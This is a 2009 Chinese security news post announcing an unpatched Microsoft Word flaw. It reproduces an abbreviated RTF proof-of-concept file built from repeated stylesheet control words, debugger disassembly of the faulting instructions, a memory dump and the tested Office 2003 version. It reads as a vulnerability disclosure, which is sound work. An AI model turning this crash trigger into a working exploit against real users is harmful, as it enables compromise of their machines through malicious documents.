ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报最新WORD 0day漏洞公布
站内搜索:

最新WORD 0day漏洞公布


2009/5/20  编辑:佚名 来源:本站整理 

吼吼,微软又出新漏洞了,最新WORD  0day漏洞公布,
又是WORD的利用漏洞,这个doc的要利用有一定难度:

poc如下:

{\rtf1\ansi\ansicpg409\deff0\deflang1033
{\fonttbl{\f0\fmodern\fprq6\fcharset0 DOTUM;}}
{\stylesheet\stylesheet\stylesheet\stylesheet\.........\stylesheet.................{hi.baidu.com/wordexp\par }}


出错指令:

:u 30cffca0 l 20
001B:30CFFCA0 8B06                                MOV       EAX,[ESI]         --->here
001B:30CFFCA2 51                                    PUSH      ECX
001B:30CFFCA3 56                                    PUSH      ESI
001B:30CFFCA4 C745F010000000           MOV       DWORD PTR [EBP-10],00000010
001B:30CFFCAB FF501C                          CALL      [EAX+1C]        ---->and here
001B:30CFFCAE F645F401                      TEST      BYTE PTR [EBP-0C],01
001B:30CFFCB2 5F                                   POP       EDI
001B:30CFFCB3 7406                               JZ       30CFFCBB
001B:30CFFCB5 81CB00000200              OR        EBX,00020000
001B:30CFFCBB 5E                                  POP       ESI
001B:30CFFCBC 8BC3                             MOV       EAX,EBX
001B:30CFFCBE 5B                                  POP       EBX
001B:30CFFCBF C9                                  LEAVE

分析:

:d esi l 4
0010:00189BD0 B0 78 3F 01 B0 78 3F 01-B0 78 3F 01 B0 78 3F 01 .x?..x?..x?..x?.

:d eax l 160
0010:013F78B0 66 00 69 00 6C 00 65 00-3A 00 2F 00 2F 00 2F 00 f.i.l.e.:./././.
0010:013F78C0 43 00 3A 00 5C 00 44 00-6F 00 63 00 75 00 6D 00 C.:.\.D.o.c.u.m.
0010:013F78D0 65 00 6E 00 74 00 73 00-25 00 32 00 30 00 61 00 e.n.t.s.%.2.0.a.
0010:013F78E0 6E 00 64 00 25 00 32 00-30 00 53 00 65 00 74 00 n.d.%.2.0.S.e.t.
0010:013F78F0 74 00 69 00 6E 00 67 00-73 00 5C 00 53 00 63 00 t.i.n.g.s.\.S.c.
0010:013F7900 7A 00 5C 00 4C 68 62 97-5C 00 6D 00 73 00 30 00 z.\.Lhb.\.m.s.0.
0010:013F7910 78 00 2D 00 30 00 78 00-78 00 5C 00 6D 00 73 00 x.-.0.x.x.\.m.s.
0010:013F7920 30 00 39 00 2D 00 30 00-78 00 78 00 25 00 32 00 0.9.-.0.x.x.%.2.
0010:013F7930 30 00 43 00 56 00 45 00-2D 00 32 00 30 00 30 00 0.C.V.E.-.2.0.0.
0010:013F7940 39 00 2D 00 78 00 78 00-78 00 78 00 25 00 32 00 9.-.x.x.x.x.%.2.
0010:013F7950 30 00 73 00 74 00 79 00-6C 00 65 00 73 00 68 00 0.s.t.y.l.e.s.h.
0010:013F7960 65 00 65 00 74 00 5C 00-00 00 78 00 70 00 2E 00 e.e.t.\...x.p...
0010:013F7970 64 00 6F 00 63 00 00 00-00 00 00 00 00 00 00 00 d.o.c...........

出错时 eip=006d0075

测试版本:office 2003 sp3 11.8169.8172(更新一些的比如82xx也行,应该还是0day)

参考消息:http://www.arpun.com/
呵呵.....估计真的懂的的朋友有多少,但是这也是比较终于的漏洞,而且比较新,想如何利用还是等牛人们公布EXP吧!更多详情留意本站:ARP联盟:www.arpun.com

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/3493.html

相关文章
  • ·[图文]最新发现超级螺旋星系比银河系明亮14倍
  • ·[图文]小白一键重装系统软件将推最新版本|UI界面图曝光
  • ·[图文]【最新“磁场地图”】揭晓神秘的太阳磁场变化
  • ·[图文]【最新研制的“变形材料”】可改变大小体积和硬度
  • ·[图文]科学家最新研究揭晓水星暗深色表面形成之谜
  • ·[图文]最新图像显示冥王星表面存在“冰山”
  • ·[图文]最新研究:地球上的水来自行星“忒伊亚”
  • ·[图文]【生物学家最新发现】没有Y染色体也能繁殖后代
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图